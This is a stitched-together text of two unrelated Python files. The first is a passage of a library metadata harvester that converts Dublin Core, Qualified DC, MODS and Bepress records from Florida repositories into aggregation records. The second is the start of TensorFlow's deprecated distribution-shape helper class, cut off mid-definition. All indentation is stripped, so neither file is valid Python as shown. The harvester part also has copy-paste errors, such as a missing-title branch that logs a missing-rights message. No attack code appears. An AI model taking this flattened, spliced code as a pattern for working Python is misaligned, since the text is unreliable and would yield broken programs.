# sourceResource.genre
# sourceResource.identifier
dPantherPURL = re.compile('http://dpanther.fiu.edu/dpService/dpPurlService')
dPantherURL = re.compile('http://dpanther')
identifier = record.metadata.get_element('.//{0}identifier'.format(dc))
try:
for ID in identifier:
if dPantherPURL.search(ID):
PURL_match = ID
sourceResource['identifier'] = ID
break
elif dPantherURL.search(ID):
sourceResource['identifier'] = ID
logger.warning('sourceResource.identifier: {0} - {1}'.format('Not a PURL',
oai_id))
is_shown_at = sourceResource['identifier']
except (TypeError, UnboundLocalError) as err:
logger.error(
'sourceResource.identifier: {0} - {1}'.format(err,
oai_id))
continue
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for element in record.metadata.get_element(
'.//{0}language'.format(dc), delimiter=';'):
if len(element) > 3:
sourceResource['language'].append({"name": element})
else:
sourceResource['language'].append({"iso_639_3": element})
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}coverage'.format(dc)):
sourceResource['spatial'] = [{'name': place}
for place in
record.metadata.get_element(
'.//{0}coverage'.format(dc))]
# sourceResource.publisher
if record.metadata.get_element('.//{0}publisher'.format(dc)):
sourceResource['publisher'] = record.metadata.get_element(
'.//{0}publisher'.format(dc))
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rights = record.metadata.get_element('.//{0}rights'.format(dc))
if rights:
sourceResource['rights'] = [{'text': rights[0]}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = []
for term in record.metadata.get_element('.//{0}subject'.format(dc),
delimiter=';'):
term = re.sub("\( lcsh \)$", '', term)
if len(term) > 0:
sourceResource['subject'].append({"name": term.strip(" ")})
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title:
sourceResource['title'] = title
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
# webResource.fileFormat
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
try:
preview = assets.thumbnail_service(record, tn)
except (TypeError, UnboundLocalError) as err:
logger.warning('aggregation.preview: {0} - {1}'.format(err, oai_id))
pass
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
def FlaLD_QDC(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_QDC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
# skip record handling
try:
if 'noharvest' in record.metadata.get_element('.//{0}requires'.format(dcterms)):
continue
except TypeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
alt_title = record.metadata.get_element(
'.//{0}alternative'.format(dcterms))
if alt_title:
sourceResource['alternative'] = alt_title
# sourceResource.collection
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in record.metadata.get_element(
'.//{0}contributor'.format(dc), delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = [{"name": name}
for name in record.metadata.get_element(
'.//{0}creator'.format(dc), delimiter=';')]
# sourceResource.date
date = record.metadata.get_element('.//{0}created'.format(dcterms))
if date is None: # TODO: there has to be a better way to do this
date = record.metadata.get_element('.//{0}issued'.format(dcterms))
if date is None:
date = record.metadata.get_element('.//{0}date'.format(dcterms))
if date is None:
date = record.metadata.get_element('.//{0}date'.format(dc))
if date is None:
date = record.metadata.get_element('.//{0}available'.format(dcterms))
if date is None:
date = record.metadata.get_element('.//{0}dateAccepted'.format(dcterms))
if date is None:
date = record.metadata.get_element('.//{0}dateCopyrighted'.format(dcterms))
if date is None:
date = record.metadata.get_element('.//{0}dateSubmitted'.format(dcterms))
if date is not None:
sourceResource['date'] = {"begin": date[0], "end": date[0], "displayDate": date[0]}
# sourceResource.description
description = []
if record.metadata.get_element(
'.//{0}description'.format(dc)) is not None:
for item in record.metadata.get_element(
'.//{0}description'.format(dc)):
description.append(item)
if record.metadata.get_element(
'.//{0}abstract'.format(dcterms)) is not None:
for item in record.metadata.get_element(
'.//{0}abstract'.format(dcterms)):
description.append(item)
if description:
sourceResource['description'] = description
# sourceResource.extent
if record.metadata.get_element('.//{0}extent'.format(dcterms)):
sourceResource['extent'] = record.metadata.get_element(
'.//{0}extent'.format(dcterms), delimiter=';')
# sourceResource.format
# sourceResource.genre
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['genre'] = []
for element in record.metadata.get_element('.//{0}format'.format(dc),
delimiter=';'):
if element.lower() in IANA_type_list:
file_format = element.lower()
pass
elif len(element) > 0:
sourceResource['genre'].append({'name': element.strip(' ')})
if len(sourceResource['genre']) == 0:
del sourceResource['genre']
# sourceResource.identifier
sourceResource['identifier'] = oai_id
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for element in record.metadata.get_element(
'.//{0}language'.format(dc), delimiter=';'):
if len(element) > 3:
sourceResource['language'].append({"name": element})
else:
sourceResource['language'].append({"iso_639_3": element})
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}spatial'.format(dcterms)):
sourceResource['spatial'] = [{'name': place}
for place in record.metadata.get_element(
'.//{0}spatial'.format(dcterms), delimiter=';')]
# sourceResource.publisher
publisher = record.metadata.get_element('.//{0}publisher'.format(dc))
if publisher:
sourceResource['publisher'] = publisher
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rightsURI = re.compile('http://rightsstatements')
if record.metadata.get_element('.//{0}rights'.format(dc)):
for rights_statement in record.metadata.get_element(
'.//{0}rights'.format(dc)):
URI = rightsURI.search(rights_statement)
if URI:
URI_match = URI.string.split(" ")[-1]
sourceResource['rights'] = [{"@id": URI_match}]
else:
sourceResource['rights'] = [{"text": rights_statement}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = [{"name": name }
for name in record.metadata.get_element(
'.//{0}subject'.format(dc), delimiter=';')]
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title is not None:
sourceResource['title'] = title
else:
logger.error('No sourceResource.title - {0}'.format(oai_id))
continue
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
# webResource.fileFormat
# TODO: file_format kicked out of SR.genre
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
for identifier in record.metadata.get_element('.//{0}identifier'.format(dc)):
if 'http' in identifier:
is_shown_at = identifier
preview = assets.thumbnail_service(identifier, tn)
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
def FlaLD_MODS(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_MODS', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
pass
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
pass
except AttributeError:
pass
if VERBOSE:
print(record.oai_urn)
logger.debug(record.oai_urn)
sourceResource = {}
if record.metadata is None:
continue
# sourceResource.alternative
if len(record.metadata.titles) > 1:
sourceResource['alternative'] = []
if len(record.metadata.titles[1:]) >= 1:
for alternative_title in record.metadata.titles[1:]:
sourceResource['alternative'].append(alternative_title)
# sourceResource.collection
if record.metadata.collection:
collection = record.metadata.collection
sourceResource['collection'] = {}
if collection.title:
sourceResource['collection']['name'] = collection.title
if collection.location:
sourceResource['collection']['host'] = collection.location
if collection.url:
sourceResource['collection']['_:id'] = collection.url
# sourceResource.contributor
try:
for name in record.metadata.names:
if name.role.text != 'Creator' or name.role.code != 'cre':
sourceResource['contributor'] = [{"@id": name.uri, "name": name.text}
if name.uri else
{"name": name.text}]
except KeyError as err:
logger.error('sourceResource.contributor: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.creator
if record.metadata.get_creators:
sourceResource['creator'] = [{"@id": name.uri, "name": name.text}
if name.uri else
{"name": name.text}
for name in record.metadata.get_creators]
# sourceResource.date
if record.metadata.dates:
date = record.metadata.dates[0].text
if ' - ' in date:
sourceResource['date'] = {"displayDate": date,
"begin": date[0:4],
"end": date[-4:]}
else:
sourceResource['date'] = {"displayDate": date,
"begin": date,
"end": date}
# sourceResource.description
if record.metadata.abstract:
sourceResource['description'] = [abstract.text
for abstract in record.metadata.abstract]
# sourceResource.extent
if record.metadata.extent:
sourceResource['extent'] = record.metadata.extent
# sourceResource.format
if record.metadata.form:
sourceResource['format'] = record.metadata.form
# sourceResource.genre
if record.metadata.genre:
sourceResource['genre'] = [{'name': genre.text,
'@id': genre.uri}
if genre.uri else
{'name': genre.text}
for genre in record.metadata.genre]
# sourceResource.identifier
try:
sourceResource['identifier'] = record.metadata.purl[0]
except IndexError as err:
logger.error('sourceResource.identifier: {0}, {1}'.format(err, record.oai_urn))
continue
# sourceResource.language
try:
if record.metadata.language:
sourceResource['language'] = [{"name": lang.text,
"iso_639_3": lang.code}
for lang in record.metadata.language]
except AttributeError as err:
logger.error('sourceResource.language: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.place : sourceResource['spatial']
try:
if record.metadata.geographic_code and len(record.metadata.geographic_code) > 0:
sourceResource['spatial'] = []
for geo_code in record.metadata.geographic_code:
code, lat, long, label = assets.tgn_cache(geo_code.strip())
sourceResource['spatial'].append({"lat": lat,
"long": long,
"name": label,
"_:attribution": "This record contains information from Thesaurus of Geographic Names (TGN) which is made available under the ODC Attribution License."})
except TypeError as err:
logger.error('sourceResource.spatial: {0}, {1}'.format(err, record.oai_urn))
continue
# sourceResource.publisher
if record.metadata.publisher:
sourceResource['publisher'] = record.metadata.publisher
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
if record.metadata.rights:
sourceResource['rights'] = [{"@id": rights.uri}
if rights.uri else
{"text": rights.text}
for rights in record.metadata.rights]
else:
logger.error('No sourceResource.rights - {0}'.format(record.oai_urn))
continue
# sourceResource.subject
try:
if record.metadata.subjects:
sourceResource['subject'] = [
{"@id": subject.uri, "name": subject.text}
if subject.uri is not None
else {"name": subject.text}
for subject in record.metadata.subjects]
except (TypeError, IndexError) as err:
logger.error('sourceResource.subject: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.title
if record.metadata.titles:
sourceResource['title'] = ['{}'.format(record.metadata.titles[0])]
else:
logger.error('No sourceResource.title: {0}'.format(record.oai_urn))
continue
# sourceResource.type
sourceResource['type'] = record.metadata.type_of_resource
# aggregation.dataProvider
first_baptist = re.compile('^FSU_FBCTLH')
leon_high = re.compile('^FSU_LeonHigh')
godby_high = re.compile('^FSU_Godby')
havana_hhs = re.compile('^FSU_HHHS')
# ringling = re.compile('^FSU_Ringling')
first_baptist_iid = first_baptist.search(record.metadata.iid)
leon_high_iid = leon_high.search(record.metadata.iid)
godby_high_iid = godby_high.search(record.metadata.iid)
havana_hhs_iid = havana_hhs.search(record.metadata.iid)
# ringling_iid = ringling.search(record.metadata.iid)
if first_baptist_iid:
data_provider = 'First Baptist Church of Tallahassee'
iprovide = 'Florida State University Libraries'
elif leon_high_iid:
data_provider = 'Leon High School, Tallahassee, Florida'
iprovide = 'Florida State University Libraries'
elif godby_high_iid:
data_provider = 'Godby High School, Tallahassee, Florida'
iprovide = 'Florida State University Libraries'
elif havana_hhs_iid:
data_provider = 'Havana History & Heritage Society, Havana, Florida'
iprovide = 'Florida State University Libraries'
# elif ringling_iid:
# data_provider = 'John and Mable Ringling Museum of Art'
# iprovide = 'Florida State University Libraries'
else:
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
pid = record.metadata.pid
if pid is None:
pid = record.oai_urn.split(':')[-1].replace('_',':')
preview = assets.thumbnail_service(pid, tn)
# aggregation.provider
# build record
try:
if record.metadata.purl[0]:
doc = assets.build(record.oai_urn, sourceResource, data_provider, record.metadata.purl[0],
preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(record.oai_urn))
continue
return docs
def FlaLD_BepressDC(file_in, tn, dprovide, iprovide=None):
def clean_mark_up(text):
mark_up_re = re.compile('<.*?>')
new_line_re = re.compile('\n')
clean_text = re.sub(mark_up_re, '', text)
clean_text = re.sub(new_line_re, ' ', clean_text)
return clean_text
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_BepressDC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
# sourceResource.collection
if record.metadata.get_element('.//{0}source'.format(dc)):
sourceResource['collection'] = {'name': record.metadata.get_element('.//{0}source'.format(dc))[0]}
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in
record.metadata.get_element(
'.//{0}contributor'.format(dc),
delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = []
for name in record.metadata.get_element('.//{0}creator'.format(dc),
delimiter=';'):
# need to test for ( Contributor ) and ( contributor )
if (len(name) > 0) and ("ontributor )" not in name):
sourceResource['creator'].append({"name": name.strip(" ")})
elif "ontributor )" in name:
if 'contributor' not in sourceResource.keys():
sourceResource['contributor'] = []
sourceResource['contributor'].append({"name": name.strip(
" ").rstrip("( Contributor )").rstrip(
"( contributor )")})
else:
sourceResource['contributor'].append(
{"name": name.strip(" ").rstrip(
"( Contributor )").rstrip("( contributor )")})
# sourceResource.date
date = record.metadata.get_element('.//{0}date.created'.format(dc))
if date:
sourceResource['date'] = {"begin": date[0], "end": date[0], "displayDate": date[0]}
# sourceResource.description
if record.metadata.get_element('.//{0}description.abstract'.format(dc)):
sourceResource['description'] = [clean_mark_up(desc) for desc in record.metadata.get_element(
'.//{0}description.abstract'.format(dc), delimiter=';')]
# sourceResource.extent
# sourceResource.format
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['format'] = record.metadata.get_element(
'.//{0}format'.format(dc))
# sourceResource.genre
# sourceResource.identifier
for identifier in record.metadata.get_element('.//{0}identifier'.format(dc)):
if 'http' in identifier:
is_shown_at = identifier
sourceResource['identifier'] = oai_id
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for lang in record.metadata.get_element('.//{0}language'.format(dc), delimiter=';'):
results = assets.iso639_2code(lang.split('-')[0])
sourceResource['language'].append(results)
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}coverage'.format(dc)):
sourceResource['spatial'] = [{'name': place}
for place in
record.metadata.get_element(
'.//{0}coverage'.format(dc))]
# sourceResource.publisher
if record.metadata.get_element('.//{0}publisher'.format(dc)):
sourceResource['publisher'] = record.metadata.get_element(
'.//{0}publisher'.format(dc))
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rightsURI = re.compile('http://rightsstatements')
if record.metadata.get_element('.//{0}rights'.format(dc)):
for rights_statement in record.metadata.get_element(
'.//{0}rights'.format(dc)):
URI = rightsURI.search(rights_statement)
if URI:
URI_match = URI.string.split(" ")[-1]
sourceResource['rights'] = [{"@id": URI_match}]
else:
sourceResource['rights'] = [{"text": rights_statement}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = []
for term in record.metadata.get_element('.//{0}subject'.format(dc),
delimiter=';'):
term = re.sub("\( lcsh \)$", '', term)
if len(term) > 0:
sourceResource['subject'].append({"name": term.strip(". ")})
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title:
sourceResource['title'] = title
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.temporal
temporal = record.metadata.get_element('.//{0}coverage'.format(dc))
if temporal:
sourceResource['temporal'] = temporal
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
if 'type' in sourceResource.keys():
sourceResource['type'] = sourceResource['type'] + record.metadata.get_element(
'.//{0}type'.format(dc))
else:
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
if record.metadata.get_element('.//{0}format'.format(dc)):
if 'type' in sourceResource.keys():
sourceResource['type'] = sourceResource['type'] + record.metadata.get_element(
'.//{0}format'.format(dc))
else:
sourceResource['type'] = record.metadata.get_element(
'.//{0}format'.format(dc), delimiter=';')
# webResource.fileFormat
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvide
# aggregation.isShownAt
# aggregation.preview
preview = None
try:
preview = assets.thumbnail_service(record, tn)
except (TypeError, UnboundLocalError) as err:
logger.warning('aggregation.preview: {0} - {1}'.format(err, oai_id))
pass
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A helper class for inferring Distribution shape."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
class _DistributionShape(object):
"""Manage and manipulate `Distribution` shape.
#### Terminology
Recall that a `Tensor` has:
- `shape`: size of `Tensor` dimensions,
- `ndims`: size of `shape`; number of `Tensor` dimensions,
- `dims`: indexes into `shape`; useful for transpose, reduce.
`Tensor`s sampled from a `Distribution` can be partitioned by `sample_dims`,
`batch_dims`, and `event_dims`. To understand the semantics of these
dimensions, consider when two of the three are fixed and the remaining
is varied:
- `sample_dims`: indexes independent draws from identical
parameterizations of the `Distribution`.
- `batch_dims`: indexes independent draws from non-identical
parameterizations of the `Distribution`.
- `event_dims`: indexes event coordinates from one sample.
The `sample`, `batch`, and `event` dimensions constitute the entirety of a
`Distribution` `Tensor`'s shape.
The dimensions are always in `sample`, `batch`, `event` order.
#### Purpose
This class partitions `Tensor` notions of `shape`, `ndims`, and `dims` into
`Distribution` notions of `sample,` `batch,` and `event` dimensions. That
is, it computes any of:
```
sample_shape batch_shape event_shape
sample_dims batch_dims event_dims
sample_ndims batch_ndims event_ndims
```
for a given `Tensor`, e.g., the result of
`Distribution.sample(sample_shape=...)`.
For a given `Tensor`, this class computes the above table using minimal
information: `batch_ndims` and `event_ndims`.
#### Examples
We show examples of distribution shape semantics.
- Sample dimensions:
Computing summary statistics, i.e., the average is a reduction over sample
dimensions.
```python
sample_dims = [0]
tf.reduce_mean(Normal(loc=1.3, scale=1.).sample_n(1000),
axis=sample_dims) # ~= 1.3
```
- Batch dimensions:
Monte Carlo estimation of a marginal probability:
Average over batch dimensions where batch dimensions are associated with
random draws from a prior.
E.g., suppose we want to find the Monte Carlo estimate of the marginal
distribution of a `Normal` with a random `Laplace` location:
```
P(X=x) = integral P(X=x|y) P(Y=y) dy
~= 1/n sum_{i=1}^n P(X=x|y_i), y_i ~iid Laplace(0,1)
= tf.reduce_mean(Normal(loc=Laplace(0., 1.).sample_n(n=1000),
scale=tf.ones(1000)).prob(x),
axis=batch_dims)
```
The `Laplace` distribution generates a `Tensor` of shape `[1000]`. When
fed to a `Normal`, this is interpreted as 1000 different locations, i.e.,
1000 non-identical Normals. Therefore a single call to `prob(x)` yields
1000 probabilities, one for every location. The average over this batch
yields the marginal.
- Event dimensions:
Computing the determinant of the Jacobian of a function of a random
variable involves a reduction over event dimensions.
E.g., Jacobian of the transform `Y = g(X) = exp(X)`:
```python
tf.compat.v1.div(1., tf.reduce_prod(x, event_dims))
```
We show examples using this class.
Write `S, B, E` for `sample_shape`, `batch_shape`, and `event_shape`.
```python
# 150 iid samples from one multivariate Normal with two degrees of freedom.
mu = [0., 0]
sigma = [[1., 0],
[0, 1]]
mvn = MultivariateNormal(mu, sigma)
rand_mvn = mvn.sample(sample_shape=[3, 50])
shaper = DistributionShape(batch_ndims=0, event_ndims=1)
S, B, E = shaper.get_shape(rand_mvn)
# S = [3, 50]
# B = []
# E = [2]
# 12 iid samples from one Wishart with 2x2 events.
sigma = [[1., 0],
[2, 1]]
wishart = Wishart(df=5, scale=sigma)
rand_wishart = wishart.sample(sample_shape=[3, 4])
shaper = DistributionShape(batch_ndims=0, event_ndims=2)
S, B, E = shaper.get_shape(rand_wishart)
# S = [3, 4]
# B = []
# E = [2, 2]
# 100 iid samples from two, non-identical trivariate Normal distributions.
mu = ... # shape(2, 3)
sigma = ... # shape(2, 3, 3)
X = MultivariateNormal(mu, sigma).sample(shape=[4, 25])
# S = [4, 25]
# B = [2]
# E = [3]
```
#### Argument Validation
When `validate_args=False`, checks that cannot be done during
graph construction are performed at graph execution. This may result in a
performance degradation because data must be switched from GPU to CPU.
For example, when `validate_args=False` and `event_ndims` is a
non-constant `Tensor`, it is checked to be a non-negative integer at graph
execution. (Same for `batch_ndims`). Constant `Tensor`s and non-`Tensor`
arguments are always checked for correctness since this can be done for
"free," i.e., during graph construction.
"""
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def __init__(self,
batch_ndims=None,
event_ndims=None,
validate_args=False,
name="DistributionShape"):
"""Construct `DistributionShape` with fixed `batch_ndims`, `event_ndims`.
`batch_ndims` and `event_ndims` are fixed throughout the lifetime of a
`Distribution`. They may only be known at graph execution.
If both `batch_ndims` and `event_ndims` are python scalars (rather than
either being a `Tensor`), functions in this class automatically perform
sanity checks during graph construction.
Args:
batch_ndims: `Tensor`. Number of `dims` (`rank`) of the batch portion of
indexes of a `Tensor`. A "batch" is a non-identical distribution, i.e,
Normal with different parameters.
event_ndims: `Tensor`. Number of `dims` (`rank`) of the event portion of
indexes of a `Tensor`. An "event" is what is sampled from a
distribution, i.e., a trivariate Normal has an event shape of [3] and a
4 dimensional Wishart has an event shape of [4, 4].
validate_args: Python `bool`, default `False`. When `True`,
non-`tf.constant` `Tensor` arguments are checked for correctness.
(`tf.constant` arguments are always checked.)
name: Python `str`. The name prepended to Ops created by this class.
Raises:
ValueError: if either `batch_ndims` or `event_ndims` are: `None`,
negative, not `int32`.
"""
if batch_ndims is None: raise ValueError("batch_ndims cannot be None")
if event_ndims is None: raise ValueError("event_ndims cannot be None")
self._batch_ndims = batch_ndims
self._event_ndims = event_ndims
self._validate_args = validate_args
with ops.name_scope(name):
self._name = name
with ops.name_scope("init"):
self._batch_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
batch_ndims, name="batch_ndims"))
self._batch_ndims_static, self._batch_ndims_is_0 = (
self._introspect_ndims(self._batch_ndims))
self._event_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
event_ndims, name="event_ndims"))
self._event_ndims_static, self._event_ndims_is_0 = (
self._introspect_ndims(self._event_ndims))
@property
def name(self):
"""Name given to ops created by this class."""
return self._name
@property
def batch_ndims(self):
"""Returns number of dimensions corresponding to non-identical draws."""
return self._batch_ndims
@property
def event_ndims(self):
"""Returns number of dimensions needed to index a sample's coordinates."""
return self._event_ndims
@property
def validate_args(self):
"""Returns True if graph-runtime `Tensor` checks are enabled."""
return self._validate_args
def get_ndims(self, x, name="get_ndims"):
"""Get `Tensor` number of dimensions (rank).
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
ndims: Scalar number of dimensions associated with a `Tensor`.
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
ndims = x.get_shape().ndims
if ndims is None:
return array_ops.rank(x, name="ndims")
return ops.convert_to_tensor(ndims, dtype=dtypes.int32, name="ndims")
def get_sample_ndims(self, x, name="get_sample_ndims"):
"""Returns number of dimensions corresponding to iid draws ("sample").
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_ndims: `Tensor` (0D, `int32`).
Raises:
ValueError: if `sample_ndims` is calculated to be negative.
"""
with self._name_scope(name, values=[x]):
ndims = self.get_ndims(x, name=name)
if self._is_all_constant_helper(ndims, self.batch_ndims,
self.event_ndims):
ndims = tensor_util.constant_value(ndims)
sample_ndims = (ndims - self._batch_ndims_static -
self._event_ndims_static)
if sample_ndims < 0:
raise ValueError(
"expected batch_ndims(%d) + event_ndims(%d) <= ndims(%d)" %
(self._batch_ndims_static, self._event_ndims_static, ndims))
return ops.convert_to_tensor(sample_ndims, name="sample_ndims")
else:
with ops.name_scope(name="sample_ndims"):
sample_ndims = ndims - self.batch_ndims - self.event_ndims
if self.validate_args:
sample_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_non_negative(sample_ndims)], sample_ndims)
return sample_ndims
def get_dims(self, x, name="get_dims"):
"""Returns dimensions indexing `sample_shape`, `batch_shape`, `event_shape`.
Example:
```python
x = ... # Tensor with shape [4, 3, 2, 1]
sample_dims, batch_dims, event_dims = _DistributionShape(
batch_ndims=2, event_ndims=1).get_dims(x)
# sample_dims == [0]
# batch_dims == [1, 2]
# event_dims == [3]
# Note that these are not the shape parts, but rather indexes into shape.
```
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_dims: `Tensor` (1D, `int32`).
batch_dims: `Tensor` (1D, `int32`).
event_dims: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
def make_dims(start_sum, size, name):
"""Closure to make dims range."""
start_sum = start_sum if start_sum else [
array_ops.zeros([], dtype=dtypes.int32, name="zero")]
if self._is_all_constant_helper(size, *start_sum):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
return ops.convert_to_tensor(
list(range(start, stop)), dtype=dtypes.int32, name=name)
else:
start = sum(start_sum)
return math_ops.range(start, start + size)
sample_ndims = self.get_sample_ndims(x, name=name)
return (make_dims([], sample_ndims, name="sample_dims"),
make_dims([sample_ndims], self.batch_ndims, name="batch_dims"),
make_dims([sample_ndims, self.batch_ndims],
self.event_ndims, name="event_dims"))
def get_shape(self, x, name="get_shape"):
"""Returns `Tensor`'s shape partitioned into `sample`, `batch`, `event`.
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_shape: `Tensor` (1D, `int32`).
batch_shape: `Tensor` (1D, `int32`).
event_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
def slice_shape(start_sum, size, name):
"""Closure to slice out shape."""
start_sum = start_sum if start_sum else [
array_ops.zeros([], dtype=dtypes.int32, name="zero")]
if (x.get_shape().ndims is not None and
self._is_all_constant_helper(size, *start_sum)):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
slice_ = x.get_shape()[start:stop].as_list()
if all(s is not None for s in slice_):
return ops.convert_to_tensor(slice_, dtype=dtypes.int32, name=name)
return array_ops.slice(array_ops.shape(x), [sum(start_sum)], [size])
sample_ndims = self.get_sample_ndims(x, name=name)
return (slice_shape([], sample_ndims,
name="sample_shape"),
slice_shape([sample_ndims], self.batch_ndims,
name="batch_shape"),
slice_shape([sample_ndims, self.batch_ndims], self.event_ndims,
name="event_shape"))
# TODO(jvdillon): Make remove expand_batch_dim and make expand_batch_dim=False
# the default behavior.
def make_batch_of_event_sample_matrices(
self, x, expand_batch_dim=True,
name="make_batch_of_event_sample_matrices"):
